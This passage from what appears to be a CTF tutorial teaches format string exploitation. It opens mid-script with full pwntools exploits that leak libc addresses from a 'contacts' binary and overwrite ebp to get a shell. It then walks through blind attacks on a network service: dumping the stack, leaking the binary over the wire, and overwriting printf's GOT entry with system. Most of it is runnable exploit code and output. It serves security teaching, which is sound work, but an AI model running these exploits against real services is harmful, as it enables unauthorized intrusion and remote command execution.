        sh.recvuntil(b'Contacts:')
        sh.recvuntil(b'Description: ')


    ## get system addr & binsh_addr
    payload = b'%31$paaaa'
    createcontact(b'1111', b'1111', b'111', payload)
    printcontact()
    libc_start_main_ret = int(sh.recvuntil(b'aaaa', drop=True), 16)
    log.success('get libc_start_main_ret addr: ' + hex(libc_start_main_ret))
    libc = LibcSearcher('__libc_start_main_ret', libc_start_main_ret)
    libc_base = libc_start_main_ret - libc.dump('__libc_start_main_ret')
    system_addr = libc_base + libc.dump('system')
    binsh_addr = libc_base + libc.dump('str_bin_sh')
    log.success('get system addr: ' + hex(system_addr))
    log.success('get binsh addr: ' + hex(binsh_addr))
    ##gdb.attach(sh)

    ## get heap addr and ebp addr
    payload = flat([
        system_addr,
        b'bbbb',
        binsh_addr,
        b'%6$p%11$pcccc',
    ])
    createcontact(b'2222', b'2222', b'222', payload)
    printcontact()
    sh.recvuntil(b'Description: ')
    data = sh.recvuntil(b'cccc', drop=True)
    data = data.split(b'0x')
    print(data)
    ebp_addr = int(data[1], 16)
    heap_addr = int(data[2], 16)

    ## modify ebp
    part1 = (heap_addr - 4) // 2
    part2 = heap_addr - 4 - part1
    payload = '%' + str(part1) + 'x%' + str(part2) + 'x%6$n'
    ##print payload
    createcontact(b'3333', b'123456789', b'300', payload.encode())
    printcontact()
    sh.recvuntil(b'Description: ')
    sh.recvuntil(b'Description: ')
    ##gdb.attach(sh)
    print('get shell')
    sh.recvuntil(b'>>>')
    ##get shell
    sh.sendline(b'5')
    sh.interactive()

For the case where the system address contains a zero byte, the exploit is as follows:

    from pwn import *

    context.log_level = "debug"
    context.arch = "x86"

    io = process("./contacts")
    binary = ELF("contacts")
    libc = binary.libc


    def createcontact(io, name, phone, descrip_len, description):
        sh = io
        sh.recvuntil(b'>>>')
        sh.sendline(b'1')
        sh.recvuntil(b'Contact info: \n')
        sh.recvuntil(b'Name: ')
        sh.sendline(name)
        sh.recvuntil(b'You have 10 numbers\n')
        sh.sendline(phone)
        sh.recvuntil(b'Length of description: ')
        sh.sendline(descrip_len)
        sh.recvuntil(b'description:\n\t\t')
        sh.sendline(description)


    def printcontact(io):
        sh = io
        sh.recvuntil(b'>>>')
        sh.sendline(b'4')
        sh.recvuntil(b'Contacts:')
        sh.recvuntil(b'Description: ')


    #gdb.attach(io)
    createcontact(io, b"1", b"1", b"111", b"%31$paaaa")
    printcontact(io)
    libc_start_main = int(io.recvuntil(b'aaaa', drop=True), 16) - 241
    log.success('get libc_start_main addr: ' + hex(libc_start_main))
    libc_base = libc_start_main - libc.symbols["__libc_start_main"]
    system = libc_base + libc.symbols["system"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    log.success("system: " + hex(system))
    log.success("binsh: " + hex(binsh))

    payload = b'%6$p%11$pccc' + p32(system) + b'bbbb' + p32(binsh) + b"dddd"
    createcontact(io, b'2', b'2', b'111', payload)
    printcontact(io)
    io.recvuntil(b'Description:')
    data = io.recvuntil(b'ccc', drop=True)
    data = data.split(b'0x')
    print(data)
    ebp_addr = int(data[1], 16)
    # system now starts 12 bytes into the description
    heap_addr = int(data[2], 16) + 12
    log.success("ebp: " + hex(ebp_addr))
    log.success("heap: " + hex(heap_addr))

    part1 = (heap_addr - 4) // 2
    part2 = heap_addr - 4 - part1
    payload = '%' + str(part1) + 'x%' + str(part2) + 'x%6$n'
    #payload=fmtstr_payload(6,{ebp_addr:heap_addr})
    ##print payload
    createcontact(io, b'3333', b'123456789', b'300', payload.encode())
    printcontact(io)
    io.recvuntil(b'Description:')
    io.recvuntil(b'Description:')
    ##gdb.attach(sh)
    log.success("get shell")
    io.recvuntil(b'>>>')
    ##get shell
    io.sendline(b'5')
    io.interactive()

Note that this does not get a shell reliably, because the string we make printf output is extremely long. But we cannot place the address we want at the front of the format string ourselves, so there is no alternative. Why do we need to print so much? Because the format string is not on the stack: even though we know the address of the ebp that needs to be changed, we cannot put that address on the stack and select it with the $ syntax. Since we cannot point at it, we also cannot use l, ll, and similar length-modifier techniques to write this address, so all that is left is to print a very large number of characters.
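The part1/part2 computation in the scripts above only has to guarantee one thing: the two `%x` field widths add up to the value that `%n` should store. The sketch below checks that property; `single_n_payload` is a hypothetical helper, the heap address is made up, and it assumes nothing else has been printed before the two padded fields.

```python
def single_n_payload(value, index):
    """Build '%<a>x%<b>x%<index>$n' so that `value` characters precede the %n."""
    part1 = value // 2
    part2 = value - part1
    return "%{}x%{}x%{}$n".format(part1, part2, index), part1 + part2


heap_addr = 0x0804c420     # made-up address of the contact description
payload, printed = single_n_payload(heap_addr - 4, 6)
print(payload, hex(printed))
```

Because the whole 4-byte value is written by a single `%n`, the number of characters printed equals the address itself, which is why the exploit produces so much output.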

## Blind format string exploitation

### Principle

Blind format string exploitation means that we are only given the IP address and port of the service, not the binary, and still have to pwn it. This is similar to BROP, except that BROP relies on a stack overflow while here we rely on a format string vulnerability. In general, we follow these steps:

• Determine whether the program is 32-bit or 64-bit
• Identify the location of the vulnerability
• Exploit it

Since I could not find the source of the original challenges after the competition, I constructed two simple challenges myself.

### Example 1 - Leaking the stack

Both the source code and the deployment files are placed in the corresponding folder [fmt_blind_stack](https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/blind_fmt_stack).

#### Determining the bitness of the program

We enter %p as a quick probe and the program echoes the following information.

➜  blind_fmt_stack git:(master) ✗ nc localhost 9999

%p

0x7ffd4799beb0

G�flag is on the stack%


This tells us that the flag is on the stack, that the program is 64-bit (the leaked pointer is wider than 32 bits), and that there is most likely a format string vulnerability.
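The bitness check can be written down as a tiny heuristic. This is only a sketch under stated assumptions: the function name is made up, it expects a plain 0x-prefixed value as printed by %p on glibc (not "(nil)"), and a small value does not prove that the target is 32-bit, since a 64-bit program can also print small numbers.

```python
def guess_bits(p_output):
    """Guess the pointer width from one %p echo such as '0x7ffd4799beb0'."""
    value = int(p_output.strip(), 16)
    # Anything that does not fit in 32 bits can only come from a 64-bit target.
    # A value that fits in 32 bits is inconclusive; treat 32 as a first guess.
    return 64 if value > 0xFFFFFFFF else 32

print(guess_bits("0x7ffd4799beb0"))
```

In practice it is worth probing several argument positions before settling on 32-bit.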

#### Exploitation

Next, let's run a small test that dumps the stack one argument at a time

from pwn import *

context.log_level = 'error'

def leak(payload):

    sh = remote('127.0.0.1', 9999)

    sh.sendline(payload)

    data = sh.recvuntil('\n', drop=True)

    if data.startswith('0x'):

        print p64(int(data, 16))

    sh.close()

i = 1

while 1:

    payload = '%{}$p'.format(i)

    leak(payload)

    i += 1


Finally, I simply looked through the output and found the flag.

////////

////////

\x00\x00\x00\x00\x00\x00\x00\xff

flag {exam

s_is_fla

g}\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\xfe\x7f\x00\x00


### Example 2 - Blind GOT hijacking

The source code and deployment files are already in the blind_fmt_got folder.

#### Determining the bitness of the program

A quick test shows that the program has a format string vulnerability and that it is 64-bit.

➜  blind_fmt_got git:(master) ✗ nc localhost 9999

%p

0x7fff3b9774c0


This time nothing else is echoed. A few more tries reveal nothing either, so we have to leak the binary itself.

#### Determining the offset

Before leaking the program, we still have to determine the offset of the format string, as follows

➜  blind_fmt_got git:(master) ✗ nc localhost 9999

aaaaaaaa%p%p%p%p%p%p%p%p%p

aaaaaaaa0x7ffdbf920fb00x800x7f3fc9ccd2300x4006b00x7f3fc9fb0ab00x61616161616161610x70257025702570250x70257025702570250xa7025


From this we can see that the format string starts at offset 6: the sixth %p prints 0x6161616161616161, which is our aaaaaaaa.

#### Leaking the binary

Since the program is 64-bit, we start leaking from 0x400000. In general, a blind format string challenge lets us send '\x00' bytes in the input, otherwise there would be no way to leak anything. In addition, the output is always truncated at '\x00', because the output functions used in format string exploitation all stop at '\x00'. So we can use the leak code below.

##coding=utf8

from pwn import *

##context.log_level = 'debug'

ip = "127.0.0.1"

port = 9999

def leak(addr):

    # try to leak addr up to three times

    num = 0

    while num < 3:

        try:

            print 'leak addr: ' + hex(addr)

            sh = remote(ip, port)

            payload = '%00008$s' + 'STARTEND' + p64(addr)

            # the payload contains '\n', so the target would stop reading early

            if '\x0a' in payload:

                return None

            sh.sendline(payload)

            data = sh.recvuntil('STARTEND', drop=True)

            sh.close()

            return data

        except Exception:

            num += 1

            continue

    return None

def getbinary():

    addr = 0x400000

    f = open('binary', 'wb')

    while addr < 0x401000:

        data = leak(addr)

        if data is None:

            # address could not be leaked, write a placeholder byte

            f.write('\xff')

            addr += 1

        elif len(data) == 0:

            # empty string: the byte at addr is '\x00'

            f.write('\x00')

            addr += 1

        else:

            f.write(data)

            addr += len(data)

    f.close()

getbinary()


Note that the payload has to be checked for '\n': a newline makes the target program read only the part before it, so the memory at that address cannot be leaked and such addresses have to be skipped.
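The reassembly logic can be tried without a remote target. The sketch below replaces the network leak with a local stand-in, so fake_leak, dump and the sample bytes are all assumptions made for illustration. It only shows how '\x00' truncation and the skipped '\n' addresses end up in the dumped file.

```python
import struct

def fake_leak(memory, base, addr):
    """Local stand-in for the remote '%8$s' leak: bytes up to the next NUL."""
    if b"\n" in struct.pack("<Q", addr):
        return None  # the target would stop reading at the newline
    start = addr - base
    end = memory.find(b"\x00", start)
    if end == -1:
        end = len(memory)
    return memory[start:end]

def dump(memory, base):
    """Rebuild the memory image one leaked string at a time."""
    out = bytearray()
    addr = base
    while addr < base + len(memory):
        data = fake_leak(memory, base, addr)
        if data is None:
            out += b"\xff"  # placeholder for an address we cannot send
            addr += 1
        elif len(data) == 0:
            out += b"\x00"  # empty string means the byte itself is NUL
            addr += 1
        else:
            out += data
            addr += len(data)
    return bytes(out)

sample = b"\x7fELF\x02\x01\x01\x00\x00\x00XYZ\x00\x00\x00"
print(dump(sample, 0x400000))
```

Only the byte at 0x40000a differs from the input here, because that address contains 0x0a and is replaced by the 0xff placeholder. A byte at such an address is still recovered when an earlier string happens to run across it.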

#### Analyzing the binary

Open the leaked binary in IDA, change the program base address, and take a quick look. This is basically enough to locate the main function of the original program.

seg000:00000000004005F6 push rbp

seg000:00000000004005F7 mov rbp, rsp

seg000:00000000004005FA add rsp, 0FFFFFFFFFFFFFF80h

seg000:00000000004005FE

seg000:00000000004005FE loc_4005FE: ; CODE XREF: seg000:0000000000400639j

seg000:00000000004005FE lea rax, [rbp-80h]

seg000:0000000000400602 mov edx, 80h ; '€'

seg000:0000000000400607 mov rsi, rax

seg000:000000000040060A mov edi, 0

seg000:000000000040060F mov eax, 0

seg000:0000000000400614 call sub_4004C0

seg000:0000000000400619 lea rax, [rbp-80h]

seg000:000000000040061D mov rdi, rax

seg000:0000000000400620 mov eax, 0

seg000:0000000000400625 call sub_4004B0

seg000:000000000040062A mov rax, cs:601048h

seg000:0000000000400631 mov rdi, rax

seg000:0000000000400634 call near ptr unk_4004E0

seg000:0000000000400639 jmp short loc_4005FE

We can be fairly sure that sub_4004C0 is the read function, because it is called with three arguments (edi = 0, rsi = the buffer at rbp-80h, edx = 0x80), which matches read. The sub_4004B0 called next, with the same buffer as its only argument, should be the output function. After that one more function is called and execution jumps back to the read, so the program is a while(1) loop that runs forever.

#### Exploitation approach

Based on the analysis above, the basic approach is as follows

- Leak the address of a libc function such as printf from the GOT
- Identify the corresponding libc and get the address of the system function
- Overwrite the GOT entry of printf with the address of system
- Send /bin/sh; as input to get a shell
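The second step is plain address arithmetic once one libc symbol has been leaked. The following is a minimal sketch: the function name, the leaked address and the symbol offsets are hypothetical values chosen for illustration, and real offsets depend on the libc build that the target actually uses.

```python
def resolve_system(leaked_read, symbol_offsets):
    """Derive the libc base from one leaked symbol, then locate system."""
    libc_base = leaked_read - symbol_offsets["read"]
    # A libc image is mapped on a page boundary; anything else suggests
    # that the offsets belong to a different libc build.
    if libc_base & 0xFFF:
        raise ValueError("libc base is not page aligned; wrong libc?")
    return libc_base, libc_base + symbol_offsets["system"]

# Hypothetical offsets and leak, for illustration only.
EXAMPLE_OFFSETS = {"read": 0xF7250, "system": 0x45390}
base, system_addr = resolve_system(0x7F3FC9BF2250, EXAMPLE_OFFSETS)
print(hex(base), hex(system_addr))
```

The page-alignment check is a cheap way to notice a wrong libc guess before attempting the GOT overwrite.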

#### Exploit script

The exploit script is as follows.


##coding=utf8

import math

from pwn import *

from LibcSearcher import LibcSearcher

##context.log_level = 'debug'

context.arch = 'amd64'

ip = "127.0.0.1"

port = 9999

def leak(addr):

    # try to leak addr up to three times

    num = 0

    while num < 3:

        try:

            print 'leak addr: ' + hex(addr)

            sh = remote(ip, port)

            payload = '%00008$s' + 'STARTEND' + p64(addr)

            # the payload contains '\n', so the target would stop reading early

            if '\x0a' in payload:

                return None

            sh.sendline(payload)

            data = sh.recvuntil('STARTEND', drop=True)

            sh.close()

            return data

        except Exception:

            num += 1

            continue

    return None

def getbinary():

    addr = 0x400000

    f = open('binary', 'wb')

    while addr < 0x401000:

        data = leak(addr)

        if data is None:

            f.write('\xff')

            addr += 1

        elif len(data) == 0:

            f.write('\x00')

            addr += 1

        else:

            f.write(data)

            addr += len(data)

    f.close()

##getbinary()

read_got = 0x601020

printf_got = 0x601018

sh = remote(ip, port)

## let the read get resolved

sh.sendline('a')

sh.recv()

## get read addr

payload = '%00008$s' + 'STARTEND' + p64(read_got)

sh.sendline(payload)

data = sh.recvuntil('STARTEND', drop=True).ljust(8, '\x00')
sh.recv()

read_addr = u64(data)

## get system addr

libc = LibcSearcher('read', read_addr)

libc_base = read_addr - libc.dump('read')

system_addr = libc_base + libc.dump('system')

log.success('system addr: ' + hex(system_addr))

log.success('read   addr: ' + hex(read_addr))

## modify printf_got

payload = fmtstr_payload(6, {printf_got: system_addr}, 0, write_size='short')

## get all the addr

addr = payload[:32]

payload = '%32d' + payload[32:]

offset = (int)(math.ceil(len(payload) / 8.0) + 1)

for i in range(6, 10):

    old = '%{}$'.format(i)

    new = '%{}$'.format(offset + i)

    payload = payload.replace(old, new)

remainer = len(payload) % 8

payload += (8 - remainer) * 'a'

payload += addr

sh.sendline(payload)

sh.recv()

## get shell

sh.sendline('/bin/sh;')

sh.interactive()


The part that deserves attention is the following code.

## modify printf_got

payload = fmtstr_payload(6, {printf_got: system_addr}, 0, write_size='short')

## get all the addr

addr = payload[:32]

payload = '%32d' + payload[32:]

offset = (int)(math.ceil(len(payload) / 8.0) + 1)

for i in range(6, 10):

    old = '%{}$'.format(i)

    new = '%{}$'.format(offset + i)

    payload = payload.replace(old, new)

remainer = len(payload) % 8

payload += (8 - remainer) * 'a'

payload += addr

sh.sendline(payload)

sh.recv()


The payload returned directly by fmtstr_payload puts the addresses at the front, and the '\x00' bytes in them cause printf to stop early (pwntools is currently developing an enhanced version of fmtstr_payload for this problem, and it should be available soon). So I used a small trick to move the addresses to the end. The main idea is to place the addresses at an 8-byte-aligned position and to adjust the argument indexes in the payload accordingly. The line to pay attention to is

offset = (int)(math.ceil(len(payload) / 8.0) + 1)


This line gives the offset of the relocated addresses relative to the start of the format string. The reasoning is that, however the indexes are rewritten, the extra characters added to the order part of '%order$hn' never total more than 8. The details are left for you to work out.
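The same idea can be sketched without post-processing the output of fmtstr_payload. The code below is an illustrative alternative rather than the script's method: build_tail_payload is a made-up helper, it always emits four %hn writes for a 64-bit value, it mixes %Nc with positional %N$hn (which glibc accepts, like the '%32d' above), and instead of a fixed +1 it recomputes the first argument index until the index and the padded text length agree.

```python
import re
import struct

def build_tail_payload(target_addr, value, fmt_offset=6, word=8):
    """Build a %hn payload whose addresses sit after the format text."""
    # Split the 64-bit value into four 16-bit writes, smallest first,
    # so the running character count only ever has to grow.
    writes = sorted(
        ((value >> (16 * i)) & 0xFFFF, target_addr + 2 * i) for i in range(4)
    )

    def render(first_index):
        text, printed = "", 0
        for k, (short, _) in enumerate(writes):
            pad = short - printed
            if pad:
                text += "%{}c".format(pad)
                printed += pad
            text += "%{}$hn".format(first_index + k)
        return text

    # Longer indexes make the text longer, so grow the index until the
    # text fits in front of the word that the index points to.
    first_index = fmt_offset
    while True:
        text = render(first_index)
        words = -(-len(text) // word)  # ceiling division
        if fmt_offset + words <= first_index:
            break
        first_index = fmt_offset + words

    text = text.ljust((first_index - fmt_offset) * word, "a")
    addrs = b"".join(struct.pack("<Q", addr) for _, addr in writes)
    return text.encode("ascii") + addrs

# Hypothetical GOT entry and libc address, for illustration only.
payload = build_tail_payload(0x601018, 0x7F1234567890)
print(payload)
```

Because the text is padded to a multiple of 8 bytes, the first appended address lands exactly on the argument index used by the first %hn, and no '\x00' byte appears before the address block.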

### Challenges

• SuCTF2018 - lock2 (The organizer provided the docker image: suctf/2018-pwn-lock2)